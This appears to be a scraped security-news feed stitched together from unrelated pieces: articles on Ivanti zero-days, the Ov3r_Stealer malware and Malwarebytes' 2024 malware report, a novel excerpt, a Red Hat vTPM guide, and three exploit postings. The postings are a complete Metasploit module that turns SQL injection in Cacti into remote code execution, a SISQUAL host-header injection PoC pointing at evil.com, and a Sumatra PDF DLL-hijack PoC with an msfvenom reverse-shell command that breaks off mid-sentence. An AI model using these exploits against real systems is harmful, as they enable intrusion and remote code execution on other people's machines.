By Deeba Ahmed
Zero-Day Nightmare: CVE-2024-21893 Exploits Surge in Attacks on Ivanti Products.
This is a post from HackRead.com Read the original post: Chained Exploits, Stolen VPN Access: Hackers Target Ivanti Users Despite Patches

The Shadowserver Foundation reports that a zero-day vulnerability, CVE-2024-21893 (CVSS score 8.2), disclosed by Ivanti on 31 January 2024, is now being actively exploited in the wild. Rapid7 noted a surge in attacks exploiting CVE-2024-21893 since February 2, before they released a proof-of-concept exploit for the issue. 

The non-profit claims to have seen over 170 discrete IP addresses involved in attempted attacks. The flaw is in the SAML component of Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA, allowing attackers to access restricted resources without authentication.

For your information, Hackread reported last month that VPN appliances had multiple zero-day vulnerabilities, allowing remote attackers to execute commands and even load a Rust-based malware called KrustyLoader. Two of the vulnerabilities tracked CVE-2023-46805 and CVE-2024-21887, impacted all supported versions of Ivanti Connect Secure and Ivanti Policy Secure gateways. 

The latest reports suggest a total of four vulnerabilities impacting Ivanti products. This analysis is based on the report that Ivanti has released patches for four vulnerabilities. The fourth one is tracked as CVE-2024-21888. The company also released a second mitigation to help organizations build resilience against attacks chaining CVE-2024-21893 with CVE-2024-21887 to compromise Ivanti devices.

However, Rapid7 principal security researcher Stephen Fewer posted on X that CVE-2024-21893 is not a new vulnerability, but an already discovered n-day in the xmltooling library tracked as CVE-2023-36661 and patched out in June 2023. 

Attacks exploiting Ivanti zero-days have been rising rapidly since their disclosure. In late January threat intelligence firm Volexity reported a surge in attacks exploiting two Ivanti zero-days, particularly by a group UTA0178, linked to China. At least 20 organizations using Ivanti Connect Secure VPN appliances were compromised, with Volexity confirming that the number of compromised systems to likely higher than what was discovered.

Reportedly, UTA0178 was exploiting CVE-2024-21893 to bypass Ivanti’s initial mitigation for two zero days. The hackers were using CVE-2023-46805 and CVE-2024-21887 in a chain to compromise Ivanti Connect Secure VPN and Policy Secure network access control.

****RELATED ARTICLES****

1.  **APTs Exploiting WinRAR 0day Flaw Despite Patch Availability**
2.  **CACTUS ransomware evades exploits VPN flaws to hack networks**
3.  **UAC-0099 Hackers Using Old WinRAR Flaw in Cyberattack on Ukraine**
4.  **Flashpoint Uncovers 100K+ Hidden Vulnerabilities, Including Zero-Days**
5.  **Windows Defender SmartScreen Flaw Exploited with Phemedrone Stealer**

Chained Exploits, Stolen VPN Access: Hackers Target Ivanti Users Despite Patches

The State of Malware 2024 report covers some topics that are of special interest to home users: privacy, passwords, malvertising, banking Trojans, and Mac malware.

Released today, the Malwarebytes State of Malware 2024 report takes a deep dive into the latest developments in the world of cybercrime. 

As home users, many of the threats we cover will only affect you second hand, such as disruptions after a company suffers a ransomware attack, or when your private information is sold online after a data breach. Sadly, there’s not a lot you can do to prevent incidents like these yourself, other than stay on top of the news and protect yourself against identity theft. 

But other threats you can do something about. So in this article we’ll focus on what threats affect you directly and how you can protect yourself. 

**Privacy **

In the last year, the UK’s Online Safety Act attempted to challenge the status quo for social media and messaging companies. The act was widely interpreted as a demand that companies scan users’ messages for illegal material, and is a first warning about the directions in which privacy may continue to be threatened in the name of greater good.  

It also acts as a reminder to be careful about what you share, even if you are under the impression that you are using the internet securely. We have seen news of ChatGPT leaking user’s information and law enforcement asking for backdoors in encryption routines. 

**Passwords **

Google and Microsoft made good on their promise to back passkeys, an encryption-based alternative to passwords that can’t be stolen, guessed, cracked, or phished.

We’d like to see more companies embrace new methods of authentication and wave passwords goodbye: Too many breaches have shown us that user education only works for those that were already doing the right things. Keeping track of the hundreds of passwords an average user has, along with the relative complexity of using a password manager have convinced us it’s time for a better alternative. 

**Malvertising **

If the last year has taught us something, it’s that scammers and malware peddlers can afford to buy sponsored search results and outbid the brand owner so that their links come out on top. Cybercriminals create Google Search ads mimicking popular brands, which lead to highly realistic, replica web pages where users are scammed or tricked into downloading malware. 

Despite efforts on the side of search providers like Google, the cybercriminals remained one step ahead, able to consistently bypass ad verification checks all year. The type of malware that’s used varies with each campaign but infostealers (which gather information from your computer, such as usernames and passwords) were the most common type. 

**Banking Trojans **

Banking trojans are one of the most serious threats facing Android devices. Banking trojans come disguised as regular apps like QR code scanners, fitness trackers, or even copies of popular apps like Instagram. 

The malicious app asks the user for permissions that allow it to monitor what happens in other apps and will then create overlay screens for legitimate apps. This allows them to capture login credentials and even multi-factor authentication (MFA) tokens.

**Mac malware **

The days of “my Mac is safe” and “Macs don’t get malware” are definitely over. There are many signs that criminals are taking note of the platform’s increasing popularity by enabling attacks to target both Windows and Mac users at the same time. 

Contrary to outdated beliefs, malware for Macs has always existed, it was just considered less serious since most Mac malware was adware or potentially unwanted programs (PUPs). This is changing. For example, in September, 2023, Malwarebytes discovered a cybercriminal campaign spreading Atomic Stealer (AMOS) malware to Mac users through malicious ads. AMOS malware can steal passwords from browsers and Apple’s Keychain, as well as grab files.

**Malwarebytes  **

Malwarebytes has solutions to safeguard individuals’ data and identities. We can protect your Android and iOS devices, Macs, Chromebooks, and Windows systems. We also have software to protect your identity, safeguard your online privacy, and block unwanted ads and trackers.

 State of Malware 2024: What consumers need to know 

Threat actors are leveraging bogus Facebook job advertisements as a lure to trick prospective targets into installing a new Windows-based stealer malware codenamed Ov3r_Stealer.
"This malware is designed to steal credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors," Trustwave SpiderLabs said in a report shared with The Hacker News.
Ov3r_Stealer

Social Engineering / Malvertising

Threat actors are leveraging bogus Facebook job advertisements as a lure to trick prospective targets into installing a new Windows-based stealer malware codenamed **Ov3r\_Stealer**.

"This malware is designed to steal credentials and crypto wallets and send those to a Telegram channel that the threat actor monitors," Trustwave SpiderLabs said in a report shared with The Hacker News.

Ov3r\_Stealer is capable of siphoning IP address-based location, hardware info, passwords, cookies, credit card information, auto-fills, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products installed on the compromised host.

While the exact end goal of the campaign is unknown, it's likely that the stolen information is offered for sale to other threat actors. Another possibility is that Ov3r\_Stealer could be updated over time to act as a QakBot-like loader for additional payloads, including ransomware.

The starting point of the attack is a weaponized PDF file that purports to be a file hosted on OneDrive, urging users to click on an "Access Document" button embedded into it.

Trustwave said it identified the PDF file being shared on a fake Facebook account impersonating Amazon CEO Andy Jassy as well as via Facebook ads for digital advertising jobs.

Users who end up clicking on the button are served an internet shortcut (.URL) file that masquerades as a DocuSign document hosted on Discord's content delivery network (CDN). The shortcut file then acts as a conduit to deliver a control panel item (.CPL) file, which is then executed using the Windows Control Panel process binary ("control.exe").

The execution of the CPL file leads to the retrieval of a PowerShell loader ("DATA1.txt") from a GitHub repository to ultimately launch Ov3r\_Stealer.

It's worth noting at this stage that a near-identical infection chain was recently disclosed by Trend Micro as having put to use by threat actors to drop another stealer called Phemedrone Stealer by exploiting the Microsoft Windows Defender SmartScreen bypass flaw (CVE-2023-36025, CVSS score: 8.8).

The similarities extend to the GitHub repository used (nateeintanan2527) and the fact that Ov3r\_Stealer shares code-level overlaps with Phemedrone.

"This malware has recently been reported, and it may be that Phemedrone was re-purposed and renamed to Ov3r\_Stealer," Trustwave said. "The main difference between the two is that Phemedrone is written in C#."

The findings come as Hudson Rock revealed that threat actors are advertising their access to law enforcement request portals of major organizations like Binance, Google, Meta, and TikTok by exploiting credentials obtained from infostealer infections.

They also follow the emergence of a category of infections called CrackedCantil that take leverage cracked software as an initial access vector to drop loaders like PrivateLoader and SmokeLoader, when subsequently act as a delivery mechanism for information stealers, crypto miners, proxy botnets, and ransomware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Beware: Fake Facebook Job Ads Spreading 'Ov3r_Stealer' to Steal Crypto and Credentials

Big Game ransomware is just one of six threats resource-constrained IT teams need to pay attention to in 2024.

Today, Malwarebytes released its 2024 State of Malware report, detailing six cyberthreats that resource-constrained IT teams should pay attention to in 2024. Top of the list is “Big Game” ransomware, the most serious cyberthreat to businesses all around the world.

Big game attacks extort vast ransoms from organizations by holding their data hostage—either with encryption, the threat of damaging data leaks, or both. The report reveals that, awash with money, the number of known Big Game attacks surged by 68% in 2023, thanks to Ransomware-as-a-Service groups like LockBit and ALPHV.

Known ransomware attacks July 2022 – December 2023

Big Game ransomware is just one part of a thriving and highly organized cybercrime business—a multi-billion-dollar mirror to the legitimate economy it feeds off. Its ecosystem supports entire supply chains, dotted about with specialized organizations like access brokers and malicious software vendors. It has brand names, PR stunts, HR departments, incentive schemes, and “employees of the month.”

And like broader, law-abiding “Business” at large, cybercrime has settled on a collection of tools that work. Its activity is built around evergreen techniques like phishing, software exploits, and password guessing, along with mature malicious technologies like info stealers, trojans, and ransomware.

For years, the latest iterations of these ideas have only offered marginal improvements on their predecessors. As a result, innovation in cybercrime has increasingly shifted towards tactics—advancements that focus more on how attacks can succeed and less on what malware can do. The 2024 State of Malware report also details how ransomware gangs use Living of the Land (LotL) techniques to hide in plain sight, and how one gang, CL0P, turned to automated zero-day attacks to break ransomware’s scalability barrier.

The report also explains how cybercriminals turned to a tactic called “malvertising” in 2023, using search ads and disposable websites that mimic legitimate brands to distribute malware as an alternative to malicious emails and document macros.

And as Macs continued to buck the trend in declining PC sales, some criminals began to add Mac malware, like Atomic Stealer, to their Windows distribution channels.

As we enter 2024, malware is as dangerous as ever, but when it is used, it is just one link in an attack chain of multiple different threats. IT and security teams now face active adversaries, zero-day exploits, compromised accounts, social engineering, and a range of other threats that don’t meet the traditional definition of malware. Against this backdrop, security budgets are shrinking while resource-constrained IT and security teams firefight ever more complex environments.

When it comes to security, “more of the same” will not work in 2024, so this year’s report also outlines what effective cyberdefense in the year ahead will require.

To learn more about the most serious threats facing IT teams in 2024, and how to combat them, download the 2024 State of Malware report.

 Known ransomware attacks up 68% in 2023 

“If molecules really were the new microchips, the promise of remote gene editing was that the body could be manipulated to upgrade itself.” An exclusive excerpt from 2054: A Novel.

2054, Part II: Next Big Thing

The trusted platform module (TPM) is a self-contained hardware encryption technology present in recent computer systems. It provides, among other things, hardware random number generation and more secure storage for encryption keys. This enables administrators to encrypt operating system disks that will then only be decryptable on the same system. Version 2.0 of the TPM specification was published in 2015, and Microsoft’s Windows 11 requires a version 2.0 TPM to be present to install.To support operating systems like Windows 11 that require a TPM, libvirt provides a virtual TPM (vTPM) that c

The trusted platform module (TPM) is a self-contained hardware encryption technology present in recent computer systems. It provides, among other things, hardware random number generation and more secure storage for encryption keys. This enables administrators to encrypt operating system disks that will then only be decryptable on the same system. Version 2.0 of the TPM specification was published in 2015, and Microsoft’s Windows 11 requires a version 2.0 TPM to be present to install.

To support operating systems like Windows 11 that require a TPM, libvirt provides a virtual TPM (vTPM) that can be configured with a virtual machine (VM) to provide the appearance of a hardware TPM. Red Hat OpenShift Virtualization has supported vTPM as an option since Red Hat OpenShift 4.13, with the persistent storage capability added in OpenShift 4.14.

This means that a Windows 11 VM can employ BitLocker encryption to its system drives and OpenShift Virtualization will handle the encryption keys on its behalf through the vTPM interface. The virtualized TPM comes with an important caveat; it does not provide the same level of security as a physical chip. Any compliance controls that rely on that physical security should be re-evaluated when considering a move to virtual.

**Preparing the cluster to support a persisted vTPM**

To support the persistent storage of secrets in a VM’s vTPM, OpenShift Virtualization must create a Persistent Volume Claim (PVC) to back that secret storage. The storage class that provides vTPM state must be configured in the HyperConverged custom resource, typically “kubevirt-hyperconverged” in the “openshift-cnv” namespace. The storage class must be a “Filesystem” type (FS), and it should support the “ReadWriteMany” access mode (RWX) in order to allow VMs using a persistent vTPM to make use of live migration. An example of the parameter is below, taken from a cluster using Red Hat OpenShift Data Foundation:

    spec:
       vmStateStorageClass: ocs-external-storagecluster-cephfs

**Adding persistence to a VM**

The change to the VM YAML to set the vTPM to persistent is likewise simple, if deeper in the hierarchy due to the spec.template.spec structure of a VM. The setting for TPM can be found under

    spec.template.spec.domain.devices.tpm

To make the vTPM use persistent storage, add “persistent: true” under “tpm”:

    oc patch vm win11 --type json -p '[{"op": "add", "path": "/spec/template/spec/domain/devices/tpm", "value": {"persistent": true}}]'

The change to the VM may be made while it is running, but it will not take effect until it is stopped and restarted by OpenShift Virtualization. For best results, include this parameter before running the VM for the first time.

Check that the TPM is now persisted by looking for its PVC. In this example, the VM “win11-broken-cow” has a persistent TPM:

    $ oc get vm
    NAME                AGE    STATUS    READY
    win11-broken-cow    2d9h   Running   True
    $ oc get pvc
    NAME                                    STATUS     CAPACITY   ACCESS MODES
    persistent-state-for-win11-broken-cow   Bound      12Mi       RWX
    win11-broken-cow                        Bound      64Gi       RWX

(Some columns have been omitted from output for readability)

There are two important caveats around the vTPM feature. First, a non-persistent vTPM will store and return encryption keys during the lifetime of the virt-launcher Pod the VM runs on. This includes when the guest OS restarts. Therefore, in the case of BitLocker Drive Encryption for a Windows VM, it is not sufficient to select the option, “Run BitLocker system check” while going through the drive encryption wizard. The problem comes as soon as the virt-launcher Pod stops, which happens if you shut down or migrate the VM. Thus, it is possible to encrypt a VM’s disk then immediately lose access to that disk the next time it stops and starts. Windows does its best to force the user to save a copy of the recovery key; in this case, it would be the only way to recover the disk.

The second caveat is that the presence of a persistent vTPM disables the ability to snapshot the VM, as there is no mechanism for snapshotting the vTPM PVC as of the publication of this article. Because of this, online backups of VMs with persistent vTPMs will not be possible. The feature is being tracked in CNV-32718, currently slated for OpenShift 4.17.

**Demonstrating persistence in a Windows 11 VM**

Starting with a Windows 11 base image, create a new VM by cloning the Windows11 template. If there is not an existing base image, generate one by following this guide: Managing virtual machines with OpenShift Pipelines. Edit the YAML of the VM as shown above to include “persistent: true” under “tpm:”. Once the VM boots, check that a “persistent-state-for-” PVC exists for the chosen VM.

At this point, the C: drive may be encrypted with BitLocker Drive Encryption. Choose the option to print the recovery key to a PDF if using the wizard to start the encryption process as there is no currently no option with OpenShift Virtualization to attach a drive in a way Windows recognizes as removable, and the wizard will refuse to  continue if neither option is chosen. Another option for recovery is to join an Active Directory domain that has the BitLocker Key Recovery service set up, but this is beyond the scope of this article, and still insufficient to get the wizard to continue.

Once the encryption process completes, test the key persistence by shutting down the VM from OpenShift Virtualization. (Simply rebooting from within the OS will result in the OS being restarted in the same virt-launcher Pod it was previously running in, so is not a valid test of persistence.)

**Conclusion**

The addition of persistent vTPM to OpenShift Virtualization opens the door to compliant workloads that require encryption at rest. Work is planned to allow snapshotting of the persistent storage so encrypted VMs can be backed up, and the question of whether non-persisted vTPM should fail to save keys has been raised.

Running Windows 11 and 2022 Server Virtual Machines in Red Hat OpenShift with persistent vTPM

This Metasploit exploit module leverages sql injection and local file inclusion vulnerabilities in Cacti versions prior to 1.2.26 to achieve remote code execution. Authentication is needed and the account must have access to the vulnerable PHP script (pollers.php). This is granted by setting the Sites/Devices/Data permission in the General Administration section.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::SQLi  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  class CactiError < StandardError; end  class CactiNotFoundError < CactiError; end  class CactiVersionNotFoundError < CactiError; end  class CactiNoAccessError < CactiError; end  class CactiCsrfNotFoundError < CactiError; end  class CactiLoginError < CactiError; end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti RCE via SQLi in pollers.php',        'Description' => %q{          This exploit module leverages a SQLi (CVE-2023-49085) and a LFI          (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to          achieve RCE. Authentication is needed and the account must have access          to the vulnerable PHP script (`pollers.php`). This is granted by          setting the `Sites/Devices/Data` permission in the `General          Administration` section.        },        'License' => MSF_LICENSE,        'Author' => [          'Aleksey Solovev', # Initial research and discovery          'Christophe De La Fuente' # Metasploit module        ],        'References' => [          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-vr3c-38wh-g855'], # SQLi          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp'], # LFI (RCE)          [ 'CVE', '2023-49085'], # SQLi          [ 'CVE', '2023-49084'] # LFI (RCE)        ],        'Platform' => ['unix linux win'],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [            'Linux Command',            {              'Arch' => ARCH_CMD,              'Platform' => [ 'unix', 'linux' ]            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Platform' => 'win'            }          ]        ],        'DefaultOptions' => {          'SqliDelay' => 3        },        'DisclosureDate' => '2023-12-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),        OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),        OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])      ]    )  end  def sqli    @sqli ||= create_sqli(dbms: SQLi::MySQLi::TimeBasedBlind) do |sqli_payload|      sqli_final_payload = '"'      sqli_final_payload << ';select ' unless sqli_payload.start_with?(';') || sqli_payload.start_with?(' and')      sqli_final_payload << "#{sqli_payload};select * from poller where 1=1 and '%'=\""      send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'pollers.php'),        'method' => 'POST',        'keep_cookies' => true,        'vars_post' => {          '__csrf_magic' => @csrf_token,          'name' => 'Main Poller',          'hostname' => 'localhost',          'timezone' => '',          'notes' => '',          'processes' => '1',          'threads' => '1',          'id' => '2',          'save_component_poller' => '1',          'action' => 'save',          'dbhost' => sqli_final_payload        },        'vars_get' => {          'header' => 'false'        }      )    end  end  def get_version(html)    # This will return an empty string if there is no match    version_str = html.xpath('//div[@class="versionInfo"]').text    unless version_str.include?('The Cacti Group')      raise CactiNotFoundError, 'The web server is not running Cacti'    end    unless version_str.match(/Version (?<version>\d{1,2}\.\d{1,2}.\d{1,2})/)      raise CactiVersionNotFoundError, 'Could not detect the version'    end    Regexp.last_match[:version]  end  def get_csrf_token(html)    html.xpath('//form/input[@name="__csrf_magic"]/@value').text  end  def do_login    if @csrf_token.blank? || @cacti_version.blank?      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'index.php'),        'method' => 'GET',        'keep_cookies' => true      )      if res.nil?        raise CactiNoAccessError, 'Could not access `index.php` - no response'      end      html = res.get_html_document      if @csrf_token.blank?        print_status('Getting the CSRF token to login')        @csrf_token = get_csrf_token(html)        if @csrf_token.empty?          # raise an error since without the CSRF token, we cannot login          raise CactiCsrfNotFoundError, 'Cannot get the CSRF token'        else          vprint_good("CSRF token: #{@csrf_token}")        end      end      if @cacti_version.blank?        print_status('Getting the version')        begin          @cacti_version = get_version(html)          vprint_good("Version: #{@cacti_version}")        rescue CactiError => e          # We can still log in without the version          print_bad("Could not get the version, the exploit might fail: #{e}")        end      end    end    print_status("Attempting login with user `#{datastore['USERNAME']}` and password `#{datastore['PASSWORD']}`")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        '__csrf_magic' => @csrf_token,        'action' => 'login',        'login_username' => datastore['USERNAME'],        'login_password' => datastore['PASSWORD']      }    )    raise CactiNoAccessError, 'Could not login - no response' if res.nil?    raise CactiLoginError, "Login failure - unexpected HTTP response code: #{res.code}" unless res.code == 302    print_good('Logged in')  end  def check    # Step 1 - Check if the target is Cacti and get the version    print_status('Checking Cacti version')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?    html = res.get_html_document    begin      @cacti_version = get_version(html)      version_msg = "The web server is running Cacti version #{@cacti_version}"    rescue CactiNotFoundError => e      return CheckCode::Safe(e.message)    rescue CactiVersionNotFoundError => e      return CheckCode::Unknown(e.message)    end    if Rex::Version.new(@cacti_version) < Rex::Version.new('1.2.26')      print_good(version_msg)    else      return CheckCode::Safe(version_msg)    end    # Step 2 - Login    @csrf_token = get_csrf_token(html)    return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?    begin      do_login    rescue CactiError => e      return CheckCode::Unknown("Login failed: #{e}")    end    @logged_in = true    # Step 3 - Check if the user has enough permissions to reach `pollers.php`    print_status('Checking permissions to access `pollers.php`')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'pollers.php'),      'method' => 'GET',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    )    return CheckCode::Unknown('Could not access `pollers.php` - no response') if res.nil?    return CheckCode::Safe('Could not access `pollers.php` - insufficient permissions') if res.code == 401    return CheckCode::Unknown("Could not access `pollers.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200    # Step 4 - Check if it is vulnerable to SQLi    print_status('Attempting SQLi to check if the target is vulnerable')    return CheckCode::Safe('Blind SQL injection test failed') unless sqli.test_vulnerable    CheckCode::Vulnerable  end  def get_ext_link_id    # Get an unused External Link ID with a time-based SQLi    @ext_link_id = rand(1000..9999)    loop do      _res, elapsed_time = Rex::Stopwatch.elapsed_time do        sqli.raw_run_sql("if(id,sleep(#{datastore['SqliDelay']}),null) from external_links where id=#{@ext_link_id}")      end      break if elapsed_time < datastore['SqliDelay']      @ext_link_id = rand(1000..9999)    end    vprint_good("Got external link ID #{@ext_link_id}")  end  def exploit    # `#do_login` will take care of populating `@csrf_token` and `@cacti_version`    unless @logged_in      begin        do_login      rescue CactiError => e        fail_with(Failure::NoAccess, "Login failure: #{e}")      end    end    @log_file_path = "log/cacti#{rand(1..999)}.log"    print_status("Backing up the current log file path and adding a new path (#{@log_file_path}) to the `settings` table")    @log_setting_name_bak = '_path_cactilog'    sqli.raw_run_sql(";update settings set name='#{@log_setting_name_bak}' where name='path_cactilog'")    @do_settings_cleanup = true    sqli.raw_run_sql(";insert into settings (name,value) values ('path_cactilog','#{@log_file_path}')")    register_file_for_cleanup(@log_file_path)    print_status("Inserting the log file path `#{@log_file_path}` to the external links table")    log_file_path_lfi = "../../#{@log_file_path}"    # Some specific path tarversal needs to be prepended to bypass the v1.2.25 fix in `link.php` (line 79):    #   $file = $config['base_path'] . "/include/content/" . str_replace('../', '', $page['contentfile']);    log_file_path_lfi = "....//....//#{@log_file_path}" if @cacti_version && Rex::Version.new(@cacti_version) == Rex::Version.new('1.2.25')    get_ext_link_id    sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')")    @do_ext_link_cleanup = true    print_status('Getting the user ID and setting permissions (it might take a few minutes)')    user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'")    fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/\A\d+\Z/)    sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})")    @do_perms_cleanup = true    print_status('Logging in again to apply new settings and permissions')    # Keep a copy of the cookie_jar and the CSRF token to be used later by the cleanup routine and remove all cookies to login again.    # This is required since this new session will block after triggering the payload and we won't be able to reuse it to cleanup.    cookie_jar_bak = cookie_jar.clone    cookie_jar.clear    csrf_token_bak = @csrf_token    # Setting `@csrf_token` to nil will force `#do_login` to get a fresh CSRF token    @csrf_token = nil    begin      do_login    rescue CactiError => e      fail_with(Failure::NoAccess, "Login failure: #{e}")    end    print_status('Poisoning the log')    header_name = rand_text_alpha(1).upcase    sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'?=system($_SERVER[\\'HTTP_#{header_name}\\']);?>',CHAR(126)),null)")    print_status('Triggering the payload')    # Expecting no response    send_request_cgi({      'uri' => normalize_uri(target_uri.path, 'link.php'),      'method' => 'GET',      'keep_cookies' => true,      'headers' => {        header_name => payload.encoded      },      'vars_get' => {        'id' => @ext_link_id,        'headercontent' => 'true'      }    }, 0)    # Restore the cookie_jar and the CSRF token to run cleanup without being blocked    cookie_jar.clear    self.cookie_jar = cookie_jar_bak    @csrf_token = csrf_token_bak  end  def cleanup    super    if @do_ext_link_cleanup      print_status('Cleaning up external link using SQLi')      sqli.raw_run_sql(";delete from external_links where id=#{@ext_link_id}")    end    if @do_perms_cleanup      print_status('Cleaning up permissions using SQLi')      sqli.raw_run_sql(";delete from user_auth_realm where realm_id=#{10000 + @ext_link_id}")    end    if @do_settings_cleanup      print_status('Cleaning up the log path in `settings` table using SQLi')      sqli.raw_run_sql(";delete from settings where name='path_cactilog' and value='#{@log_file_path}'")      sqli.raw_run_sql(";update settings set name='path_cactilog' where name='#{@log_setting_name_bak}'")    end  endend

Cacti pollers.php SQL Injection / Remote Code Execution

SISQUAL WFM version 7.1.319.103 suffers from a host header injection vulnerability.

    # Exploit Title: SISQUAL WFM 7.1.319.103 Host Header Injection# Discovered Date: 17/03/2023# Reported Date: 17/03/2023# Exploit Author: Omer Shaik (unknown_exploit)# Vendor Homepage: https://www.sisqualwfm.com# Version: 7.1.319.103# Tested on: SISQUAL WFM 7.1.319.103# Affected Version: sisqualWFM - 7.1.319.103# Fixed Version: sisqualWFM - 7.1.319.111# CVE : CVE-2023-36085# CVSS: 3.1 (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)# Category: Web Apps# Reference: https://github.com/omershaik0/Handmade_Exploits/tree/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085A proof-of-concept(POC) scenario that demonstrates a potential host header injection vulnerability in sisqualWFM version 7.1.319.103, specifically targeting the /sisqualIdentityServer/core endpoint. This vulnerability could be exploited by an attacker to manipulate webpage links or redirect users to another site with ease, simply by tampering with the host header.****************************************************************************************************Orignal Request****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: sisqualwfm.cloudCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Orignal Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://sisqualwfm.cloud/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginDate: Wed, 22 Mar 2023 13:22:10 GMTContent-Length: 0****************************************************************************************************██████╗  ██████╗  ██████╗██╔══██╗██╔═══██╗██╔════╝██████╔╝██║   ██║██║     ██╔═══╝ ██║   ██║██║     ██║     ╚██████╔╝╚██████╗╚═╝      ╚═════╝  ╚═════╝                ****************************************************************************************************Request has been modified to redirect user to evil.com (Intercepted request using Burp proxy)****************************************************************************************************GET /sisqualIdentityServer/core/login HTTP/2Host: evil.comCookie:<cookie>Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9****************************************************************************************************Response****************************************************************************************************HTTP/2 302 FoundCache-Control: no-store, no-cache, must-revalidateLocation: https://evil.com/sisqualIdentityServer/core/Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadX-Content-Type-Options: nosniffX-Frame-Options: sameoriginContent-Length: 0****************************************************************************************************Method of Attack****************************************************************************************************curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv****************************************************************************************************

SISQUAL WFM 7.1.319.103 Host Header Injection

Sumatra PDF version 3.5.2 suffers from a DLL hijacking vulnerability.

    # Exploit Title: Sumatra PDF 3.5.2 DLL Hijacking# Date: 06.02.2024# Exploit Author: Ravishanka Silva# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 10, Windows 11# CVE : CVE-2024-24528Description:Sumatra PDF is a free and open-source document viewer for Windows. It is a lightweight and minimalistic application designed to quickly and efficiently view PDF, eBook (ePub, Mobi), XPS, DjVu, CHM, and comic book (CBZ and CBR) files.Key features of Sumatra PDF include its fast startup and rendering speed, support for a variety of document formats, and a user-friendly interface. While it may not have all the advanced features found in some other PDF viewers, Sumatra PDF is a popular choice for users who prioritize speed and simplicity in a document viewer.A DLL Hijacking vulnerability exists in Sumatra PDF Version 3.5.2 which allows a local attacker to execute arbitrary code and obtain a certain level of persistence on the compromised host, in the context of current logged-in user, by placing a crafted DLL in the installation directory, resulting in the hijacking of the following DLL files: dbgcore.DLLprofapi.dllPROPSYS.dllTextShaping.dllDWrite.dllProof of Concept:1. Create a malicious .dll file via msfvenom,msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o dbgcore.DLL2. Place the malicious DLL inside the Sumatra PDF installation folder. (Usually 